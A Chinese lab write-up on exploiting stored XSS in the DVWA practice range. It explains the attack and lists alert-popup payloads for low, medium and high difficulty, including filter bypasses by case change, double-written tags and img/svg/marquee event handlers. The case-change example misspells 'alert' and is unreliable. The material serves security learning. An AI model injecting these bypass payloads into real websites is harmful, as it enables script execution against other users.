dvwa靶场xss储存型

xss储存型

xxs储存型

攻击者事先将恶意代码上传或储存到漏洞服务器中,只要受害者浏览包含此恶意代码的页面就会执行恶意代码。产生层面:后端漏洞特征:持久性的、前端执行、储存在后端数据库

存储型XSS数据交互过程:用户输入数据->后端执行php代码->存入数据库某张表->返回数据给php页面->回显前端

不需要访问指定链接,访问到存在恶意代码的网页会自动弹出

low

没有任何过滤

xss常用语句

cpp 复制代码
<script>alert(/xss/)</script>

message框插入恶意代码

上传后刷新页面就会自动弹出

name栏插入恶意代码

会发现无法对长度做了限制将maxlenth手动更改至能插入恶意代码的长度
相同插入上述代码进行刷新页面也可以

medium

本关对message参数进行了编码导致无法执行代码,还对name参数的

绕过方法

大小写绕过

cpp 复制代码
<script>alter(/xss/)</script>

双写绕过

cpp 复制代码
<sc<script>ript>alert(/xss/)</script>

插入方法和low等级,没什么区别

high

cpp 复制代码
<img src=1 onerror=alert(1)>
<iMg src=1 oNeRrOr=alert(1)>
<ImG src=1 OnErRoR=alert(1)>
<svg onload=alert(1)>
<sVg OnLoAd=alert(1)>
<SvG oNlOaD=alert(1)>
<svg/onload=alert(1)>
<sVg/OnLoAd=alert(1)>
<SvG/oNlOaD=alert(1)>
<marquee onscroll=alert(1)>
<mArQuEe OnScRoLl=alert(1)>
<MaRqUeE oNsCrOlL=alert(1)>

成了

相关推荐
泽虞4 分钟前
《Qt应用开发》笔记
linux·开发语言·c++·笔记·qt
报错小能手4 分钟前
linux学习笔记(21)线程同步——互斥锁
linux·笔记·学习
明明真系叻1 小时前
《量子计算》学习笔记:量子计算的基本定义(续)
笔记·学习·量子计算
不会调制解调的猫3 小时前
笔记 | 内网服务器通过wifi穿透,设置流量走向
运维·服务器·笔记
程序员大雄学编程4 小时前
「机器学习笔记7」决策树学习:从理论到实践的全面解析(上)
笔记·决策树·机器学习
聪明的笨猪猪5 小时前
Java Spring “Bean” 面试清单(含超通俗生活案例与深度理解)
java·经验分享·笔记·面试
bnsarocket6 小时前
Verilog和FPGA的自学笔记3——仿真文件Testbench的编写
笔记·fpga开发·verilog·自学
丰锋ff7 小时前
2025 年真题配套词汇单词笔记(考研真相)
笔记·考研
小熊猫程序猿9 小时前
Datawhale 算法笔记 AI硬件与机器人大模型 (五) Isaac Sim 入门
人工智能·笔记·机器人
不太可爱的叶某人12 小时前
【学习笔记】kafka权威指南——第10章 监控kafka (7-10章只做了解)
笔记·学习·kafka